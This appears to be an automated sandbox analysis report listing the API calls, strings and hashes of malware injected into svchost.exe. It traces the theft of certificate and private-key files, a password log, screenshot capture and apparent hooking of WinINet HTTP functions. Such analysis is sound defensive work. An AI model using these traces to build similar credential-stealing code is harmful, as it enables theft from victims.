                                                                                                                                                                                                                    • API String ID: 2920098687-2492803057
                                                                                                                                                                                                                    • Opcode ID: e195dc1e046f053eb3141a29de2c19dabbddba979bd7578a9c02a843e74f8530
                                                                                                                                                                                                                    • Instruction ID: 058d2e19cc3ae5a7eb33f0f5158297650a9a262ff920cb78621d39c29839aa8a
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e195dc1e046f053eb3141a29de2c19dabbddba979bd7578a9c02a843e74f8530
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 52615831A402919BE7165B749C59B7B3BE8AF8A74AF188599FC87C7341CB31CD05C790
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 02C906FE
                                                                                                                                                                                                                    • PathAddBackslashA.SHLWAPI(7f1bf841), ref: 02C9073F
                                                                                                                                                                                                                    • PathAddBackslashA.SHLWAPI(7f1bf841), ref: 02C9077B
                                                                                                                                                                                                                    • CreateDirectoryA.KERNEL32(?,00000000,7f1bf841), ref: 02C90790
                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 02C9079A
                                                                                                                                                                                                                    • IsUserAnAdmin.SHELL32 ref: 02C907A2
                                                                                                                                                                                                                    • PathMakeSystemFolderA.SHLWAPI(?), ref: 02C907B3
                                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000), ref: 02C907BA
                                                                                                                                                                                                                    • SetFileAttributesA.KERNEL32(?,00000000), ref: 02C907F2
                                                                                                                                                                                                                    • DeleteFileA.KERNEL32(?), ref: 02C907FF
                                                                                                                                                                                                                    • PathAddBackslashA.SHLWAPI(7f1bf841,?,?), ref: 02C90847
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Path$Backslash$ErrorFileLast$AdminAttributesCreateDeleteDirectoryFolderMakeSystemUsermemset
                                                                                                                                                                                                                    • String ID: 7f1bf841$keys.zip$path.txt
                                                                                                                                                                                                                    • API String ID: 1668326001-3963007484
                                                                                                                                                                                                                    • Opcode ID: 061c459f3358f74cae1d51bf583356a7047ce1b8a08023aa8d9ec97b01a96b21
                                                                                                                                                                                                                    • Instruction ID: b2282085784792c57ea597b4e053d02bf983241986ebfcbaf99e989dbca682b6
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 061c459f3358f74cae1d51bf583356a7047ce1b8a08023aa8d9ec97b01a96b21
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3E714731A402999FEB128B349C5CBAB7BE8EF85704F144AD4E985DB241DF71CA49CF90
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 02C8EB7E
                                                                                                                                                                                                                    • PathAddBackslashA.SHLWAPI(7F1BFDA3), ref: 02C8EBAB
                                                                                                                                                                                                                    • CreateDirectoryA.KERNEL32(?,00000000), ref: 02C8EBED
                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 02C8EBF3
                                                                                                                                                                                                                    • IsUserAnAdmin.SHELL32 ref: 02C8EBFB
                                                                                                                                                                                                                    • PathMakeSystemFolderA.SHLWAPI(?), ref: 02C8EC0C
                                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000), ref: 02C8EC13
                                                                                                                                                                                                                    • PathAddBackslashA.SHLWAPI(7F1BFDA3,?,?), ref: 02C8EC87
                                                                                                                                                                                                                    • CreateDirectoryA.KERNEL32(00000000,00000000), ref: 02C8ECC5
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Path$BackslashCreateDirectoryErrorLast$AdminFolderMakeSystemUsermemset
                                                                                                                                                                                                                    • String ID: 7F1BFDA3$Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}$P0#v$path.txt
                                                                                                                                                                                                                    • API String ID: 2217318736-2109808429
                                                                                                                                                                                                                    • Opcode ID: 58c15778cd57061d1bf4c3995e2303941722763288b21a53f60d0d2a0ae54a50
                                                                                                                                                                                                                    • Instruction ID: 2ed45fa89f3537049a4328ad7dd3c48984d289ba92d9bddbc3343abe1d9e4ec7
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 58c15778cd57061d1bf4c3995e2303941722763288b21a53f60d0d2a0ae54a50
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F57127319006955FDB129B349C58BEB7BE8AF85308F14CA95FD86CB241EB70DA49CB90
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 02C832F0: IsUserAnAdmin.SHELL32 ref: 02C832FA
                                                                                                                                                                                                                      • Part of subcall function 02C832F0: memset.MSVCRT ref: 02C83330
                                                                                                                                                                                                                      • Part of subcall function 02C832F0: RegOpenKeyExA.ADVAPI32(80000001,software\microsoft,00000000,00000101,?,?,?,00000000), ref: 02C83357
                                                                                                                                                                                                                      • Part of subcall function 02C832F0: RegQueryValueExA.ADVAPI32(?,00000001,00000000,00000001,00000000,00000104,?,?,00000000), ref: 02C8337A
                                                                                                                                                                                                                      • Part of subcall function 02C832F0: GetProcessHeap.KERNEL32(00000008,00000015,?,?,00000000), ref: 02C833ED
                                                                                                                                                                                                                      • Part of subcall function 02C832F0: HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 02C833F4
                                                                                                                                                                                                                      • Part of subcall function 02C832F0: memset.MSVCRT ref: 02C83404
                                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 02C842E1
                                                                                                                                                                                                                    • _snprintf.MSVCRT ref: 02C842F6
                                                                                                                                                                                                                      • Part of subcall function 02C83D90: IsNetworkAlive.SENSAPI(02C763DD,00000000), ref: 02C83DA3
                                                                                                                                                                                                                      • Part of subcall function 02C83D90: IsUserAnAdmin.SHELL32 ref: 02C83DB1
                                                                                                                                                                                                                      • Part of subcall function 02C83D90: DnsFlushResolverCache.DNSAPI ref: 02C83DBB
                                                                                                                                                                                                                      • Part of subcall function 02C83D90: memset.MSVCRT ref: 02C83DD8
                                                                                                                                                                                                                      • Part of subcall function 02C83D90: lstrcpynA.KERNEL32(00000000,http://,00000104,?,00000000,00000000), ref: 02C83DF7
                                                                                                                                                                                                                      • Part of subcall function 02C83D90: StrNCatA.SHLWAPI(00000000,www.bing.com,00000104), ref: 02C83E10
                                                                                                                                                                                                                      • Part of subcall function 02C83D90: InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02C83E23
                                                                                                                                                                                                                      • Part of subcall function 02C83D90: memset.MSVCRT ref: 02C83E3C
                                                                                                                                                                                                                      • Part of subcall function 02C83D90: lstrcpynA.KERNEL32(00000000,http://,00000104,?,?,?,?,00000000,00000000), ref: 02C83E55
                                                                                                                                                                                                                      • Part of subcall function 02C83D90: StrNCatA.SHLWAPI(00000000,www.microsoft.com,00000104), ref: 02C83E68
                                                                                                                                                                                                                      • Part of subcall function 02C83D90: InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02C83E75
                                                                                                                                                                                                                    • Sleep.KERNEL32(000001F4), ref: 02C84315
                                                                                                                                                                                                                    • GetTempPathA.KERNEL32(00000104,?), ref: 02C8432C
                                                                                                                                                                                                                    • GetTempFileNameA.KERNEL32(?,00000000,00000000,?), ref: 02C84344
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C843AC
                                                                                                                                                                                                                    • HeapValidate.KERNEL32(00000000), ref: 02C843AF
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C843BC
                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 02C843BF
                                                                                                                                                                                                                    • RtlImageNtHeader.NTDLL(00000000), ref: 02C8440E
                                                                                                                                                                                                                    • TerminateThread.KERNEL32(000002A0,00000000), ref: 02C84438
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Heap$memset$Process$AdminCheckConnectionInternetTempUserlstrcpyn$AliveAllocCacheCountFileFlushFreeHeaderImageNameNetworkOpenPathQueryResolverSleepTerminateThreadTickValidateValue_snprintf
                                                                                                                                                                                                                    • String ID: 80F503A7a$C:\Windows\apppatch\svchost.exe$id=1&post=%u
                                                                                                                                                                                                                    • API String ID: 3337567932-3078109131
                                                                                                                                                                                                                    • Opcode ID: e2e9da4f6c5ab10f68bee24fd1a57cdc281e0e90e6a58f9f9bc6091db8cea263
                                                                                                                                                                                                                    • Instruction ID: bbd2204ae303518fbca62e2b7ffa70cbcb0041e8f9508d5356b3ba8fd619da67
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e2e9da4f6c5ab10f68bee24fd1a57cdc281e0e90e6a58f9f9bc6091db8cea263
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F4513B71E802466BE735ABB0AC49FBA7B6DDF84B08F048694F609D71C1EB70D504CB60
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • LoadLibraryExA.KERNEL32(Crypt32.dll,00000000,00000000,7622F550,00000000), ref: 02C800CE
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CertVerifyCertificateChainPolicy), ref: 02C800E4
                                                                                                                                                                                                                    • VirtualProtect.KERNEL32(00000000,00000006,00000040,?,76231620), ref: 02C800FC
                                                                                                                                                                                                                    • VirtualProtect.KERNEL32(00000000,00000006,?,?), ref: 02C8011E
                                                                                                                                                                                                                    • LoadLibraryExA.KERNEL32(Wininet.dll,00000000,00000000), ref: 02C8012A
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,HttpSendRequestA), ref: 02C80140
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,HttpSendRequestW), ref: 02C8015C
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,HttpSendRequestExA), ref: 02C80178
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,HttpSendRequestExW), ref: 02C80194
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,InternetQueryDataAvailable), ref: 02C801B0
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,InternetReadFile), ref: 02C801CC
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,InternetReadFileExA), ref: 02C801E8
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,InternetReadFileExW), ref: 02C80204
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,InternetCloseHandle), ref: 02C80220
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: AddressProc$LibraryLoadProtectVirtual
                                                                                                                                                                                                                    • String ID: CertVerifyCertificateChainPolicy$Crypt32.dll$HttpSendRequestA$HttpSendRequestExA$HttpSendRequestExW$HttpSendRequestW$InternetCloseHandle$InternetQueryDataAvailable$InternetReadFile$InternetReadFileExA$InternetReadFileExW$Wininet.dll
                                                                                                                                                                                                                    • API String ID: 1705253364-835984666
                                                                                                                                                                                                                    • Opcode ID: 0ea05016a823ce1192b41bd76d47603c3c2e7eb29b6b33b6f0fb218726745ecd
                                                                                                                                                                                                                    • Instruction ID: d3d08d81a9f4b24674397dfb42814877a6d3e56e70194442aa7d9c041c26f86b
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0ea05016a823ce1192b41bd76d47603c3c2e7eb29b6b33b6f0fb218726745ecd
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9931C771BC031A35FA2276744C46FAF975E4F85F99F018534B803B2445DBA6E70989B8
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • StrStrIA.SHLWAPI(?,prv_key.pfx), ref: 02C8DA6D
                                                                                                                                                                                                                    • PathAddBackslashA.SHLWAPI(7F1BFD21), ref: 02C8DAAE
                                                                                                                                                                                                                    • PathAddBackslashA.SHLWAPI(7F1BFD21), ref: 02C8DAE2
                                                                                                                                                                                                                    • CreateDirectoryA.KERNEL32(?,00000000,7F1BFD21), ref: 02C8DAF7
                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 02C8DB01
                                                                                                                                                                                                                    • IsUserAnAdmin.SHELL32 ref: 02C8DB09
                                                                                                                                                                                                                    • PathMakeSystemFolderA.SHLWAPI(?), ref: 02C8DB1A
                                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000), ref: 02C8DB21
                                                                                                                                                                                                                    • SetFileAttributesA.KERNEL32(?,00000000), ref: 02C8DB5B
                                                                                                                                                                                                                    • DeleteFileA.KERNEL32(?), ref: 02C8DB68
                                                                                                                                                                                                                    • PathAddBackslashA.SHLWAPI(7F1BFD21,02CBDAD8,02CBDAD9), ref: 02C8DBA9
                                                                                                                                                                                                                    • CreateDirectoryA.KERNEL32(?,00000000), ref: 02C8DBE4
                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 02C8DBEE
                                                                                                                                                                                                                    • IsUserAnAdmin.SHELL32 ref: 02C8DBF6
                                                                                                                                                                                                                    • PathMakeSystemFolderA.SHLWAPI(?), ref: 02C8DC07
                                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000), ref: 02C8DC0E
                                                                                                                                                                                                                    • SetFileAttributesA.KERNEL32(?,00000000), ref: 02C8DC4B
                                                                                                                                                                                                                    • DeleteFileA.KERNEL32(?), ref: 02C8DC58
                                                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,02C8DE40,02CBDAD8,00000000,00000000), ref: 02C8DC8E
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(00000000,?), ref: 02C8DCA6
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 02C8DCB7
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Path$ErrorFileLast$BackslashCreate$AdminAttributesDeleteDirectoryFolderHandleMakeSystemUser$CloseInformationThread
                                                                                                                                                                                                                    • String ID: 7F1BFD21$pass.log$path.txt$prv_key.pfx
                                                                                                                                                                                                                    • API String ID: 448721894-2902503963
                                                                                                                                                                                                                    • Opcode ID: fe3a6b11d3ae989e97f00802c4a965d868f1fef18a7a7015b7a7d6400cd2998a
                                                                                                                                                                                                                    • Instruction ID: 8815aab9caae678beb954c7b7f2384fd36a2e34a63283f0a9db963741f17374a
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fe3a6b11d3ae989e97f00802c4a965d868f1fef18a7a7015b7a7d6400cd2998a
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 24712871A406955FD7129F389C58BEABBE8EF85305F14C6D4E98BC7240DB70CA49CB90
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • PathAddBackslashA.SHLWAPI(7F1BFD21), ref: 02C8DE69
                                                                                                                                                                                                                    • CreateDirectoryA.KERNEL32(02CCB3A8,00000000), ref: 02C8DEA8
                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 02C8DEB4
                                                                                                                                                                                                                    • IsUserAnAdmin.SHELL32 ref: 02C8DEB8
                                                                                                                                                                                                                    • PathMakeSystemFolderA.SHLWAPI(02CCB3A8), ref: 02C8DEC7
                                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000), ref: 02C8DECE
                                                                                                                                                                                                                    • CreateDirectoryA.KERNEL32(02CCB3A8,00000000), ref: 02C8DF02
                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 02C8DF08
                                                                                                                                                                                                                    • IsUserAnAdmin.SHELL32 ref: 02C8DF0C
                                                                                                                                                                                                                    • PathMakeSystemFolderA.SHLWAPI(02CCB3A8), ref: 02C8DF1B
                                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000), ref: 02C8DF22
                                                                                                                                                                                                                    • GetFileAttributesA.KERNEL32(?), ref: 02C8DF2C
                                                                                                                                                                                                                    • CopyFileA.KERNEL32(02CCB7C8,02CCB6C0,00000000), ref: 02C8DFD9
                                                                                                                                                                                                                    • CopyFileA.KERNEL32(02CCB7C8,02CCB6C0,00000000), ref: 02C8E053
                                                                                                                                                                                                                    • CreateMutexA.KERNEL32(00000000,00000000,Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}), ref: 02C8E05E
                                                                                                                                                                                                                    • Sleep.KERNEL32(000003E8), ref: 02C8E06F
                                                                                                                                                                                                                    • ReleaseMutex.KERNEL32(00000000), ref: 02C8E076
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(00000000,?), ref: 02C8E088
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 02C8E099
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ErrorLast$CreateFilePath$AdminCopyDirectoryFolderHandleMakeMutexSystemUser$AttributesBackslashCloseInformationReleaseSleep
                                                                                                                                                                                                                    • String ID: 7F1BFD21$Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}$P0#v$keys\$prv_key.pfx$sign.cer
                                                                                                                                                                                                                    • API String ID: 843071566-3237391086
                                                                                                                                                                                                                    • Opcode ID: 63df87b1389e73f310abe04a44552865a79ab70052f19bda21694c9fd6c57f00
                                                                                                                                                                                                                    • Instruction ID: f642bda1ad04707f7f86fbdde485840caa9dd1467792f90a24e1f8482e558661
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 63df87b1389e73f310abe04a44552865a79ab70052f19bda21694c9fd6c57f00
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E56115309407859FE3139F789828B637FE8AF86749F2DC598EC8A8B251DB31D901C790
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • PathAddBackslashA.SHLWAPI(7F1BFD21), ref: 02C8DE69
                                                                                                                                                                                                                    • CreateDirectoryA.KERNEL32(02CCB3A8,00000000), ref: 02C8DEA8
                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 02C8DEB4
                                                                                                                                                                                                                    • IsUserAnAdmin.SHELL32 ref: 02C8DEB8
                                                                                                                                                                                                                    • PathMakeSystemFolderA.SHLWAPI(02CCB3A8), ref: 02C8DEC7
                                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000), ref: 02C8DECE
                                                                                                                                                                                                                    • CreateDirectoryA.KERNEL32(02CCB3A8,00000000), ref: 02C8DF02
                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 02C8DF08
                                                                                                                                                                                                                    • IsUserAnAdmin.SHELL32 ref: 02C8DF0C
                                                                                                                                                                                                                    • PathMakeSystemFolderA.SHLWAPI(02CCB3A8), ref: 02C8DF1B
                                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000), ref: 02C8DF22
                                                                                                                                                                                                                    • GetFileAttributesA.KERNEL32(?), ref: 02C8DF2C
                                                                                                                                                                                                                    • CopyFileA.KERNEL32(02CCB7C8,02CCB6C0,00000000), ref: 02C8DFD9
                                                                                                                                                                                                                    • CopyFileA.KERNEL32(02CCB7C8,02CCB6C0,00000000), ref: 02C8E053
                                                                                                                                                                                                                    • CreateMutexA.KERNEL32(00000000,00000000,Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}), ref: 02C8E05E
                                                                                                                                                                                                                    • Sleep.KERNEL32(000003E8), ref: 02C8E06F
                                                                                                                                                                                                                    • ReleaseMutex.KERNEL32(00000000), ref: 02C8E076
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(00000000,?), ref: 02C8E088
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 02C8E099
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ErrorLast$CreateFilePath$AdminCopyDirectoryFolderHandleMakeMutexSystemUser$AttributesBackslashCloseInformationReleaseSleep
                                                                                                                                                                                                                    • String ID: 7F1BFD21$Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}$P0#v$keys\$prv_key.pfx$sign.cer
                                                                                                                                                                                                                    • API String ID: 843071566-3237391086
                                                                                                                                                                                                                    • Opcode ID: 0f3de1a9f2c7a9f0d95eda06f328f725c0eb46c2c6d7376dc29f13454d0e5aaf
                                                                                                                                                                                                                    • Instruction ID: 8073210d7dfe9ab2eae567177829af1d7b106da2d0ae7efb7a5e7d2196afdf02
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0f3de1a9f2c7a9f0d95eda06f328f725c0eb46c2c6d7376dc29f13454d0e5aaf
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 166104309407859FE7139F789829B637FE8AF86749F2DC598EC8A8B251DB31D901C790
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • PathAddBackslashA.SHLWAPI(7f1bf8b2), ref: 02C92677
                                                                                                                                                                                                                    • CreateDirectoryA.KERNEL32(?,00000000), ref: 02C926B5
                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 02C926BF
                                                                                                                                                                                                                    • IsUserAnAdmin.SHELL32 ref: 02C926C7
                                                                                                                                                                                                                    • PathMakeSystemFolderA.SHLWAPI(?), ref: 02C926D8
                                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000), ref: 02C926DF
                                                                                                                                                                                                                    • StrStrIA.SHLWAPI(00000000,?), ref: 02C9273D
                                                                                                                                                                                                                    • GetFileAttributesA.KERNEL32(00000000), ref: 02C9274C
                                                                                                                                                                                                                    • PathAddBackslashA.SHLWAPI(7f1bf8b2), ref: 02C92777
                                                                                                                                                                                                                    • _snprintf.MSVCRT ref: 02C927D7
                                                                                                                                                                                                                    • PathAddBackslashA.SHLWAPI(7f1bf8b2,?,00000000), ref: 02C92817
                                                                                                                                                                                                                    • _snprintf.MSVCRT ref: 02C92877
                                                                                                                                                                                                                    • PathAddBackslashA.SHLWAPI(7f1bf8b2), ref: 02C928D7
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Path$Backslash$ErrorLast_snprintf$AdminAttributesCreateDirectoryFileFolderMakeSystemUser
                                                                                                                                                                                                                    • String ID: 7f1bf8b2$Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}$P0#v$keys%i.zip$keys.zip$path%i.txt$path.txt
                                                                                                                                                                                                                    • API String ID: 2433436401-3801798930
                                                                                                                                                                                                                    • Opcode ID: e97a4dd92c6aada3f8315842884981c78afeda46d24dc3508823d473e6baa31c
                                                                                                                                                                                                                    • Instruction ID: e269fe7a14478ff30028027f5ad099ea76403cb8572d759d573ccfae62207c67
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e97a4dd92c6aada3f8315842884981c78afeda46d24dc3508823d473e6baa31c
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 78B10A3190058A5FDF1ACB38986C7EA7BE5AF89300F1449E8EDD5D7240EB71CA48CB95
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetCursorPos.USER32(?), ref: 02C80EF3
                                                                                                                                                                                                                    • GetDC.USER32(00000000), ref: 02C80F04
                                                                                                                                                                                                                    • CreateCompatibleDC.GDI32(00000000), ref: 02C80F19
                                                                                                                                                                                                                    • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 02C80F2E
                                                                                                                                                                                                                    • SelectObject.GDI32(?,00000000), ref: 02C80F48
                                                                                                                                                                                                                    • BitBlt.GDI32(?,00000000,00000000,?,?,?,?,?,00660046), ref: 02C80F76
                                                                                                                                                                                                                    • GetObjectA.GDI32(00000000,00000018,?), ref: 02C80F8C
                                                                                                                                                                                                                    • GlobalAlloc.KERNEL32 ref: 02C80FF0
                                                                                                                                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 02C81001
                                                                                                                                                                                                                    • GetDIBits.GDI32(?,00000000,00000000,?,00000000,?,00000000), ref: 02C81020
                                                                                                                                                                                                                    • CreateFileA.KERNEL32(02C8131E,C0000000,00000003,00000000,00000002,00000080,00000000), ref: 02C8103C
                                                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,?,0000000E,?,00000000), ref: 02C8107D
                                                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,?,00000028,?,00000000), ref: 02C8109A
                                                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 02C810B6
                                                                                                                                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 02C810BD
                                                                                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 02C810C4
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02C810DC
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 02C810EE
                                                                                                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 02C810FB
                                                                                                                                                                                                                    • ReleaseDC.USER32(00000000,?), ref: 02C81107
